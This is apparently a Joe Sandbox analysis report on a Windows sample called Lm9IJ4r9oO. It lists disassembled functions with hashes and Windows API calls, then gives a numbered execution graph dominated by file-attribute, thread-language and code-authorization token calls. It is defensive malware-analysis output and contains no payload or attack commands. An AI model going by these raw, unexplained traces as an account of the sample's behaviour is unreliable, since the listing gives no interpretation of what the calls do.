                                                                                                   • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 158306478-0
                                                                                                  • Opcode ID: 483df4102c20ed97d42d33909e2c406127a0d18650b3e7f134c07a1b453f4091
                                                                                                  • Instruction ID: f0ce707d2a7a0f9582ff5e7313786ef00e5e2e78384d390045d752d49059a057
                                                                                                  • Opcode Fuzzy Hash: 483df4102c20ed97d42d33909e2c406127a0d18650b3e7f134c07a1b453f4091
                                                                                                  • Instruction Fuzzy Hash: CF1184B15026167E67213BB65CCEDEF6E6FEE457D8310262AFB0191201EF64CD0287B9
                                                                                                  APIs
                                                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0069066A,00000000,00000001,0000000C,00000000,?,0068807C,00000000,00000000,00000000), ref: 00691C8A
                                                                                                  • GetLastError.KERNEL32(?,0069066A,00000000,00000001,0000000C,00000000,?,0068807C,00000000,00000000,00000000,00000000,00000000,?,0068861F,?), ref: 00691C96
                                                                                                    • Part of subcall function 00691C5C: CloseHandle.KERNEL32(FFFFFFFE,00691CA6,?,0069066A,00000000,00000001,0000000C,00000000,?,0068807C,00000000,00000000,00000000,00000000,00000000), ref: 00691C6C
                                                                                                  • ___initconout.LIBCMT ref: 00691CA6
                                                                                                    • Part of subcall function 00691C1E: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00691C4D,00690657,00000000,?,0068807C,00000000,00000000,00000000,00000000), ref: 00691C31
                                                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0069066A,00000000,00000001,0000000C,00000000,?,0068807C,00000000,00000000,00000000,00000000), ref: 00691CBB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                   • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                  • String ID:
                                                                                                  • API String ID: 2744216297-0
                                                                                                  • Opcode ID: 3b86759b8bb190e4d1e3a700ceb425526a8db8214075ffaf1e4c7a188195336d
                                                                                                  • Instruction ID: 70d5f785dbe76d7ead07aecee8e5c8acd9a0aa22f0dc548bb3fdf5f818a51e99
                                                                                                  • Opcode Fuzzy Hash: 3b86759b8bb190e4d1e3a700ceb425526a8db8214075ffaf1e4c7a188195336d
                                                                                                  • Instruction Fuzzy Hash: B1F0303614151AFFCF222F91ED05E993F6FFB193A1F115411FA19C9A30CA328C61AB94
                                                                                                  APIs
                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 0067209F
                                                                                                    • Part of subcall function 006796FD: RaiseException.KERNEL32(E06D7363,00000001,00000003,0067125C,?,?,?,?,0067125C,?,0069DFCC), ref: 0067975D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                   • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise___std_exception_copy
                                                                                                  • String ID: ios_base::badbit set$ios_base::failbit set
                                                                                                  • API String ID: 3109751735-1240500531
                                                                                                  • Opcode ID: 92b8d6c6a958b9bd064ed5adc9477471e6189b3f01c4f25769daeb8bef02d9fa
                                                                                                  • Instruction ID: a017ad2b856944997a3807f4af8ce636575cfbc0e45cd9a9f4383e570b743e87
                                                                                                  • Opcode Fuzzy Hash: 92b8d6c6a958b9bd064ed5adc9477471e6189b3f01c4f25769daeb8bef02d9fa
                                                                                                  • Instruction Fuzzy Hash: 8651F6B5900204ABCB14DF68DC41AAAF7FAFF49310F14C21EF9189B741E774AA01CBA5
                                                                                                  APIs
                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0067B55F
                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0067B613
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                   • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 3480331319-1018135373
                                                                                                  • Opcode ID: 2df142555da7cbfbcf5119a1ba9fe7cb380fc9304cf92d6df37746880391406e
                                                                                                  • Instruction ID: f536f462ec738e1b2a5b96a2f9405388d8386b69a9babe7a96281572763ee2c0
                                                                                                  • Opcode Fuzzy Hash: 2df142555da7cbfbcf5119a1ba9fe7cb380fc9304cf92d6df37746880391406e
                                                                                                  • Instruction Fuzzy Hash: D0419234A002099BCF10DF69C885BAEBBB7AF45324F14D159E918AB392D731EA11CF94
                                                                                                  APIs
                                                                                                  • EncodePointer.KERNEL32(00000000,?), ref: 0067BE52
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                   • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EncodePointer
                                                                                                  • String ID: MOC$RCC
                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                  • Opcode ID: 6f1decd407854bd15da8180773017656c248043ed61c078525c294319ab3fa0b
                                                                                                  • Instruction ID: df6eb3ea8792f6a727941d503356e41496bfaa106a5e373e7386ca478a5c424d
                                                                                                  • Opcode Fuzzy Hash: 6f1decd407854bd15da8180773017656c248043ed61c078525c294319ab3fa0b
                                                                                                  • Instruction Fuzzy Hash: 09415771900209AFCF15DF98CD81BEEBBB6FF48300F1890A9FA08A6211D3359A50DF55
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0067193B
                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0067198A
                                                                                                    • Part of subcall function 00676616: _Yarn.LIBCPMT ref: 00676635
                                                                                                    • Part of subcall function 00676616: _Yarn.LIBCPMT ref: 00676659
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                   • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                  • String ID: bad locale name
                                                                                                  • API String ID: 1908188788-1405518554
                                                                                                  • Opcode ID: 4182ae2b69197ca44dea1a2ae70e90b8f762f5963a42f78622c0feaffcb708a1
                                                                                                  • Instruction ID: f8a4457931488ab26d8ed15be6bd2062b7958b054a47ea40383f02d0bc4613e0
                                                                                                  • Opcode Fuzzy Hash: 4182ae2b69197ca44dea1a2ae70e90b8f762f5963a42f78622c0feaffcb708a1
                                                                                                  • Instruction Fuzzy Hash: 9211A071904B84DFD320CF69C905B5BBBE8EF19710F008A1EE489C7B81E775A504CBA5

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:7.8%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:0.4%
                                                                                                  Total number of Nodes:730
                                                                                                  Total number of Limit Nodes:49
                                                                                                  execution_graph 148955 29d272c 148956 29d26ea 148955->148956 148957 29d273e 148956->148957 148960 29d44f0 148956->148960 148958 29d272a 148961 29d450a 148960->148961 148962 29d452f 148961->148962 148965 29d45b8 148961->148965 148969 29d45a8 148961->148969 148962->148958 148966 29d45cb 148965->148966 148973 29d4620 148966->148973 148970 29d45cb 148969->148970 148972 29d4620 GetFileAttributesW 148970->148972 148971 29d45e9 148971->148962 148972->148971 148974 29d4645 148973->148974 148975 29d45e9 148974->148975 148978 29d4a98 GetFileAttributesW 148974->148978 148975->148962 148976 29d470b 148976->148975 148977 29d4a98 GetFileAttributesW 148976->148977 148977->148975 148978->148976 148979 8337bc0 148980 8337bff 148979->148980 148981 8337c03 148980->148981 148983 83385f8 148980->148983 148984 8338626 148983->148984 148985 833863f 148984->148985 148987 8338330 GetFileAttributesW 148984->148987 148991 833831f 148984->148991 148989 8338330 GetFileAttributesW 148985->148989 148990 833831f GetFileAttributesW 148985->148990 148986 8338680 148986->148980 148987->148985 148989->148986 148990->148986 148992 8338357 148991->148992 148993 833835b 148992->148993 148994 8341830 GetFileAttributesW 148992->148994 148995 8341820 GetFileAttributesW 148992->148995 148993->148985 148994->148993 148995->148993 148713 83409a0 148714 83409c3 148713->148714 148718 8340808 148714->148718 148723 8340869 148714->148723 148715 83409cc 148719 834082d 148718->148719 148720 8340858 148719->148720 148728 81583fc 148719->148728 148736 8158400 148719->148736 148720->148715 148724 8340834 148723->148724 148725 8340858 148724->148725 148726 8158400 GetFileAttributesW 148724->148726 148727 81583fc GetFileAttributesW 148724->148727 148725->148715 148726->148724 148727->148724 148744 29d4a98 148728->148744 148751 29d4af8 148728->148751 148729 815841a 148730 8158420 148729->148730 148734 8158400 
GetFileAttributesW 148729->148734 148735 81583fc GetFileAttributesW 148729->148735 148730->148719 148731 815846c 148731->148719 148734->148731 148735->148731 148737 815841a 148736->148737 148740 29d4a98 GetFileAttributesW 148736->148740 148741 29d4af8 GetFileAttributesW 148736->148741 148738 8158420 148737->148738 148742 8158400 GetFileAttributesW 148737->148742 148743 81583fc GetFileAttributesW 148737->148743 148738->148719 148739 815846c 148739->148719 148740->148737 148741->148737 148742->148739 148743->148739 148749 29d4a98 GetFileAttributesW 148744->148749 148750 29d4af8 GetFileAttributesW 148744->148750 148745 29d4ac2 148746 29d4ac8 148745->148746 148756 29d4118 148745->148756 148746->148729 148749->148745 148750->148745 148752 29d4b10 148751->148752 148753 29d4b25 148752->148753 148754 29d4118 GetFileAttributesW 148752->148754 148753->148729 148755 29d4b56 148754->148755 148755->148729 148757 29d4f40 GetFileAttributesW 148756->148757 148759 29d4b56 148757->148759 148759->148729 148996 29dd928 148997 29dd970 ComputeAccessTokenFromCodeAuthzLevel 148996->148997 148998 29dd9ad 148997->148998 148127 83450f2 148128 83450f9 148127->148128 148131 834520f 148128->148131 148130 8345113 148130->148130 148133 8345216 148131->148133 148132 834521a 148132->148130 148133->148132 148136 8336860 148133->148136 148144 8336850 148133->148144 148137 8336898 148136->148137 148139 833689c 148137->148139 148152 83366d9 148137->148152 148162 83366e8 148137->148162 148138 833693d 148172 83365e0 148138->148172 148176 83365d0 148138->148176 148139->148133 148145 8336860 148144->148145 148147 833689c 148145->148147 148150 83366d9 IdentifyCodeAuthzLevelW 148145->148150 148151 83366e8 IdentifyCodeAuthzLevelW 148145->148151 148146 833693d 148148 83365e0 3 API calls 148146->148148 148149 83365d0 3 API calls 148146->148149 148147->148133 148148->148147 148149->148147 148150->148146 148151->148146 148153 8336703 148152->148153 148154 8336731 148153->148154 148156 8336761 148153->148156 
148182 8336678 148154->148182 148187 8336688 148154->148187 148155 833675a 148155->148138 148158 83366d9 IdentifyCodeAuthzLevelW 148156->148158 148159 83366e8 IdentifyCodeAuthzLevelW 148156->148159 148157 83367ce 148157->148138 148158->148157 148159->148157 148163 8336703 148162->148163 148164 8336731 148163->148164 148166 8336761 148163->148166 148168 8336678 IdentifyCodeAuthzLevelW 148164->148168 148169 8336688 IdentifyCodeAuthzLevelW 148164->148169 148165 833675a 148165->148138 148170 83366d9 IdentifyCodeAuthzLevelW 148166->148170 148171 83366e8 IdentifyCodeAuthzLevelW 148166->148171 148167 83367ce 148167->148138 148168->148165 148169->148165 148170->148167 148171->148167 148252 833652a 148172->148252 148257 8336538 148172->148257 148173 833661b 148173->148139 148177 8336576 148176->148177 148178 83365da 148176->148178 148177->148139 148180 833652a 3 API calls 148178->148180 148181 8336538 3 API calls 148178->148181 148179 833661b 148179->148139 148180->148179 148181->148179 148183 833668c 148182->148183 148191 29dc7c8 148183->148191 148196 29dc7b8 148183->148196 148184 8336694 148184->148155 148188 8336694 148187->148188 148189 29dc7b8 IdentifyCodeAuthzLevelW 148187->148189 148190 29dc7c8 IdentifyCodeAuthzLevelW 148187->148190 148188->148155 148189->148188 148190->148188 148192 29dc7eb 148191->148192 148193 29dc86f 148192->148193 148201 29dc9d8 148192->148201 148209 29dc9c8 148192->148209 148193->148184 148197 29dc7eb 148196->148197 148198 29dc86f 148197->148198 148199 29dc9d8 IdentifyCodeAuthzLevelW 148197->148199 148200 29dc9c8 IdentifyCodeAuthzLevelW 148197->148200 148198->148184 148199->148198 148200->148198 148202 29dc9ec 148201->148202 148203 29dc9f3 148202->148203 148217 29dcf52 148202->148217 148222 29dcf69 148202->148222 148227 29dce19 148202->148227 148232 29dcf80 148202->148232 148237 29dce28 148202->148237 148203->148193 148210 29dc9ec 148209->148210 148211 29dc9f3 148210->148211 148212 29dce19 IdentifyCodeAuthzLevelW 148210->148212 148213 29dcf69 
IdentifyCodeAuthzLevelW 148210->148213 148214 29dce28 IdentifyCodeAuthzLevelW 148210->148214 148215 29dcf80 IdentifyCodeAuthzLevelW 148210->148215 148216 29dcf52 IdentifyCodeAuthzLevelW 148210->148216 148211->148193 148212->148211 148213->148211 148214->148211 148215->148211 148216->148211 148219 29dcecf 148217->148219 148218 29dd000 148218->148203 148242 29dd158 148219->148242 148245 29dd168 148219->148245 148223 29dcecf 148222->148223 148225 29dd158 IdentifyCodeAuthzLevelW 148223->148225 148226 29dd168 IdentifyCodeAuthzLevelW 148223->148226 148224 29dd000 148224->148203 148225->148224 148226->148224 148229 29dce4c 148227->148229 148228 29dce9c 148228->148203 148229->148228 148230 29dd158 IdentifyCodeAuthzLevelW 148229->148230 148231 29dd168 IdentifyCodeAuthzLevelW 148229->148231 148230->148228 148231->148228 148233 29dcecf 148232->148233 148235 29dd158 IdentifyCodeAuthzLevelW 148233->148235 148236 29dd168 IdentifyCodeAuthzLevelW 148233->148236 148234 29dd000 148234->148203 148235->148234 148236->148234 148239 29dce4c 148237->148239 148238 29dce9c 148238->148203 148239->148238 148240 29dd158 IdentifyCodeAuthzLevelW 148239->148240 148241 29dd168 IdentifyCodeAuthzLevelW 148239->148241 148240->148238 148241->148238 148248 29dd590 148242->148248 148246 29dd176 148245->148246 148247 29dd590 IdentifyCodeAuthzLevelW 148245->148247 148246->148218 148247->148246 148249 29dd595 148248->148249 148250 29dd827 IdentifyCodeAuthzLevelW 148249->148250 148251 29dd877 148250->148251 148253 8336538 148252->148253 148262 8335f68 148253->148262 148269 8335f59 148253->148269 148258 8336556 148257->148258 148260 8335f59 3 API calls 148258->148260 148261 8335f68 3 API calls 148258->148261 148259 833656c 148259->148173 148260->148259 148261->148259 148277 8335ec0 148262->148277 148282 8335ed0 148262->148282 148263 8335f91 148287 8334b28 148263->148287 148292 8334b1a 148263->148292 148270 8335f68 148269->148270 148273 8335ed0 IdentifyCodeAuthzLevelW 148270->148273 148274 8335ec0 
IdentifyCodeAuthzLevelW 148270->148274 148271 8335f91 148275 8334b1a 2 API calls 148271->148275 148276 8334b28 2 API calls 148271->148276 148272 8335fa6 148272->148173 148273->148271 148274->148271 148275->148272 148276->148272 148278 8335ed0 148277->148278 148279 8335f23 148278->148279 148297 8335b39 148278->148297 148302 8335b48 148278->148302 148279->148263 148283 8335f23 148282->148283 148284 8335edf 148282->148284 148283->148263 148284->148283 148285 8335b39 IdentifyCodeAuthzLevelW 148284->148285 148286 8335b48 IdentifyCodeAuthzLevelW 148284->148286 148285->148283 148286->148283 148288 8334b76 148287->148288 148307 8334540 148288->148307 148312 833452f 148288->148312 148289 8334d1b 148293 8334b28 148292->148293 148295 8334540 2 API calls 148293->148295 148296 833452f 2 API calls 148293->148296 148294 8334d1b 148295->148294 148296->148294 148298 8335b48 148297->148298 148299 8335be4 148298->148299 148300 29dc7b8 IdentifyCodeAuthzLevelW 148298->148300 148301 29dc7c8 IdentifyCodeAuthzLevelW 148298->148301 148299->148279 148300->148299 148301->148299 148303 8335b6d 148302->148303 148304 8335be4 148302->148304 148305 29dc7b8 IdentifyCodeAuthzLevelW 148303->148305 148306 29dc7c8 IdentifyCodeAuthzLevelW 148303->148306 148304->148279 148305->148304 148306->148304 148308 8334558 148307->148308 148317 83344b8 148308->148317 148322 83344a8 148308->148322 148309 8334571 148309->148289 148313 8334558 148312->148313 148315 83344b8 2 API calls 148313->148315 148316 83344a8 2 API calls 148313->148316 148314 8334571 148314->148289 148315->148314 148316->148314 148318 83344cc 148317->148318 148327 8334210 148318->148327 148331 83341fc 148318->148331 148319 8334520 148319->148309 148323 83344cc 148322->148323 148325 8334210 2 API calls 148323->148325 148326 83341fc 2 API calls 148323->148326 148324 8334520 148324->148309 148325->148324 148326->148324 148328 8334238 148327->148328 148329 83342d0 148328->148329 148335 83341d2 148328->148335 148329->148319 148332 8334238 
148331->148332 148333 83342d0 148332->148333 148334 83341d2 2 API calls 148332->148334 148333->148319 148334->148333 148336 83341e3 148335->148336 148337 83341d8 148335->148337 148336->148329 148338 83340aa GetFileAttributesW SetThreadUILanguage 148337->148338 148338->148336 148339 8135518 148340 813554c 148339->148340 148341 8135583 148340->148341 148346 8135eb1 148340->148346 148352 8135ec0 148340->148352 148342 81359f3 148341->148342 148357 815dd84 148341->148357 148347 8135e61 148346->148347 148348 8135ebe 148346->148348 148347->148341 148361 8135db8 148348->148361 148366 8135da8 148348->148366 148349 8135f05 148349->148349 148353 8135eed 148352->148353 148355 8135db8 IdentifyCodeAuthzLevelW 148353->148355 148356 8135da8 IdentifyCodeAuthzLevelW 148353->148356 148354 8135f05 148354->148354 148355->148354 148356->148354 148371 815d4c0 148357->148371 148375 815d4a9 148357->148375 148358 815dd91 148362 8135e0f 148361->148362 148363 8135de1 148361->148363 148362->148349 148363->148362 148364 29dc7b8 IdentifyCodeAuthzLevelW 148363->148364 148365 29dc7c8 IdentifyCodeAuthzLevelW 148363->148365 148364->148362 148365->148362 148367 8135db8 148366->148367 148368 8135e0f 148367->148368 148369 29dc7b8 IdentifyCodeAuthzLevelW 148367->148369 148370 29dc7c8 IdentifyCodeAuthzLevelW 148367->148370 148368->148349 148369->148368 148370->148368 148372 815d4d2 148371->148372 148373 815d4dc 148371->148373 148372->148373 148379 815d43b 148372->148379 148373->148358 148376 815d4d2 148375->148376 148377 815d4dc 148375->148377 148376->148377 148378 815d43b 2 API calls 148376->148378 148377->148358 148378->148377 148383 81362e0 148379->148383 148392 81362f0 148379->148392 148380 815d446 148380->148373 148384 813657b 148383->148384 148385 8136319 148383->148385 148386 8136396 148385->148386 148401 8138350 148385->148401 148410 8137c10 148385->148410 148420 8138340 148385->148420 148430 813834e 148385->148430 148439 8137c20 148385->148439 148386->148380 148393 813657b 148392->148393 148394 
8136319 148392->148394 148395 8136396 148394->148395 148396 8138350 2 API calls 148394->148396 148397 8138340 2 API calls 148394->148397 148398 8137c10 2 API calls 148394->148398 148399 8137c20 2 API calls 148394->148399 148400 813834e 2 API calls 148394->148400 148395->148380 148396->148395 148397->148395 148398->148395 148399->148395 148400->148395 148404 8138378 148401->148404 148402 81384ee 148454 8139e39 148402->148454 148464 8139f27 148402->148464 148469 8139c80 148402->148469 148479 8139c90 148402->148479 148404->148402 148450 8136b74 148404->148450 148414 8137c20 148410->148414 148411 8137c41 148411->148386 148412 81384ee 148416 8139c90 2 API calls 148412->148416 148417 8139c80 2 API calls 148412->148417 148418 8139f27 2 API calls 148412->148418 148419 8139e39 2 API calls 148412->148419 148413 8136b74 SetThreadUILanguage 148413->148412 148414->148411 148414->148412 148414->148413 148415 8138508 148416->148415 148417->148415 148418->148415 148419->148415 148421 813834a 148420->148421 148422 81383b7 148420->148422 148421->148386 148423 81384ee 148422->148423 148424 8136b74 SetThreadUILanguage 148422->148424 148426 8139c90 2 API calls 148423->148426 148427 8139c80 2 API calls 148423->148427 148428 8139f27 2 API calls 148423->148428 148429 8139e39 2 API calls 148423->148429 148424->148423 148425 8138508 148426->148425 148427->148425 148428->148425 148429->148425 148431 8138378 148430->148431 148432 8136b74 SetThreadUILanguage 148431->148432 148433 81384ee 148431->148433 148432->148433 148435 8139c90 2 API calls 148433->148435 148436 8139c80 2 API calls 148433->148436 148437 8139f27 2 API calls 148433->148437 148438 8139e39 2 API calls 148433->148438 148434 8138508 148435->148434 148436->148434 148437->148434 148438->148434 148440 8137c41 148439->148440 148444 8137c4b 148439->148444 148440->148386 148441 8137ff4 148441->148386 148442 81384ee 148446 8139c90 2 API calls 148442->148446 148447 8139c80 2 API calls 148442->148447 148448 8139f27 2 API calls 
148442->148448 148449 8139e39 2 API calls 148442->148449 148443 8136b74 SetThreadUILanguage 148443->148442 148444->148441 148444->148442 148444->148443 148445 8138508 148446->148445 148447->148445 148448->148445 148449->148445 148451 8138c60 SetThreadUILanguage 148450->148451 148453 8138cd1 148451->148453 148453->148402 148455 8139e47 148454->148455 148489 813bbbf 148455->148489 148493 813bd5d 148455->148493 148497 813b9f8 148455->148497 148501 813b9e8 148455->148501 148456 8139f1f 148505 8286c58 148456->148505 148513 8286c48 148456->148513 148457 813a243 148465 8139f39 148464->148465 148467 8286c48 2 API calls 148465->148467 148468 8286c58 2 API calls 148465->148468 148466 813a243 148467->148466 148468->148466 148470 8139ccc 148469->148470 148475 813b9f8 2 API calls 148470->148475 148476 813b9e8 2 API calls 148470->148476 148477 813bbbf 2 API calls 148470->148477 148478 813bd5d 2 API calls 148470->148478 148471 8139f1f 148473 8286c48 2 API calls 148471->148473 148474 8286c58 2 API calls 148471->148474 148472 813a243 148473->148472 148474->148472 148475->148471 148476->148471 148477->148471 148478->148471 148480 8139ccc 148479->148480 148483 813b9f8 2 API calls 148480->148483 148484 813b9e8 2 API calls 148480->148484 148485 813bbbf 2 API calls 148480->148485 148486 813bd5d 2 API calls 148480->148486 148481 8139f1f 148487 8286c48 2 API calls 148481->148487 148488 8286c58 2 API calls 148481->148488 148482 813a243 148483->148481 148484->148481 148485->148481 148486->148481 148487->148482 148488->148482 148490 813ba6f 148489->148490 148491 813bd48 148490->148491 148521 813c8c8 148490->148521 148491->148456 148494 813bd48 148493->148494 148495 813ba6f 148493->148495 148494->148456 148495->148494 148496 813c8c8 2 API calls 148495->148496 148496->148495 148498 813bd48 148497->148498 148499 813ba21 148497->148499 148498->148456 148499->148498 148500 813c8c8 2 API calls 148499->148500 148500->148499 148502 813ba21 148501->148502 148503 813bd48 148501->148503 148502->148503 
148504 813c8c8 2 API calls 148502->148504 148503->148456 148504->148502 148506 8286c6a 148505->148506 148507 8286c6f 148506->148507 148599 8286122 148506->148599 148507->148457 148508 8286d79 148607 82b6759 148508->148607 148612 82b6768 148508->148612 148617 82b67f7 148508->148617 148514 8286c4d 148513->148514 148516 8286c6f 148514->148516 148520 8286122 2 API calls 148514->148520 148515 8286d79 148517 82b6759 2 API calls 148515->148517 148518 82b6768 2 API calls 148515->148518 148519 82b67f7 2 API calls 148515->148519 148516->148457 148517->148516 148518->148516 148519->148516 148520->148515 148522 813c8d9 148521->148522 148523 813cadd 148522->148523 148524 813c907 148522->148524 148525 813c9a6 148523->148525 148548 828bde8 148523->148548 148554 828bdd9 148523->148554 148524->148525 148531 820500a 148524->148531 148537 8204f88 148524->148537 148543 82050a8 148524->148543 148525->148490 148533 8205012 148531->148533 148532 820501d 148532->148525 148533->148532 148560 8205990 148533->148560 148570 8205971 148533->148570 148534 82050f7 148534->148525 148538 820501d 148537->148538 148539 8204fc1 148537->148539 148538->148525 148539->148538 148541 8205990 GetFileAttributesW 148539->148541 148542 8205971 GetFileAttributesW 148539->148542 148540 82050f7 148540->148525 148541->148540 148542->148540 148544 82050b9 148543->148544 148546 8205990 GetFileAttributesW 148544->148546 148547 8205971 GetFileAttributesW 148544->148547 148545 82050f7 148545->148525 148546->148545 148547->148545 148549 828be03 148548->148549 148551 828be3f 148549->148551 148580 828c440 148549->148580 148589 828c431 148549->148589 148550 828c35d 148550->148525 148551->148525 148555 828bde8 148554->148555 148556 828be3f 148555->148556 148558 828c440 2 API calls 148555->148558 148559 828c431 2 API calls 148555->148559 148556->148525 148557 828c35d 148557->148525 148558->148557 148559->148557 148561 82059c0 148560->148561 148562 82059c4 148561->148562 148564 8206464 148561->148564 148567 8332e77 
GetFileAttributesW 148561->148567 148568 8332e48 GetFileAttributesW 148561->148568 148569 8332e88 GetFileAttributesW 148561->148569 148562->148534 148563 8206495 148563->148534 148564->148563 148565 82064c0 GetFileAttributesW 148564->148565 148566 82064b4 GetFileAttributesW 148564->148566 148565->148563 148566->148563 148567->148564 148568->148564 148569->148564 148573 8205990 148570->148573 148571 8206495 148571->148534 148572 8206464 148572->148571 148575 82064c0 GetFileAttributesW 148572->148575 148576 82064b4 GetFileAttributesW 148572->148576 148573->148572 148574 82059c4 148573->148574 148577 8332e77 GetFileAttributesW 148573->148577 148578 8332e48 GetFileAttributesW 148573->148578 148579 8332e88 GetFileAttributesW 148573->148579 148574->148534 148575->148571 148576->148571 148577->148572 148578->148572 148579->148572 148584 828cd78 GetFileAttributesW SetThreadUILanguage 148580->148584 148585 828cd6c GetFileAttributesW SetThreadUILanguage 148580->148585 148586 828caa0 GetFileAttributesW SetThreadUILanguage 148580->148586 148587 828cab0 GetFileAttributesW SetThreadUILanguage 148580->148587 148588 828cc41 GetFileAttributesW SetThreadUILanguage 148580->148588 148581 828c462 148583 828ea75 GetFileAttributesW SetThreadUILanguage 148581->148583 148582 828c474 148582->148550 148583->148582 148584->148581 148585->148581 148586->148581 148587->148581 148588->148581 148590 828c440 148589->148590 148593 828cd78 GetFileAttributesW SetThreadUILanguage 148590->148593 148594 828cd6c GetFileAttributesW SetThreadUILanguage 148590->148594 148595 828caa0 GetFileAttributesW SetThreadUILanguage 148590->148595 148596 828cab0 GetFileAttributesW SetThreadUILanguage 148590->148596 148597 828cc41 GetFileAttributesW SetThreadUILanguage 148590->148597 148591 828c462 148598 828ea75 GetFileAttributesW SetThreadUILanguage 148591->148598 148592 828c474 148592->148550 148593->148591 148594->148591 148595->148591 148596->148591 148597->148591 148598->148592 148600 828612e 148599->148600 148602 
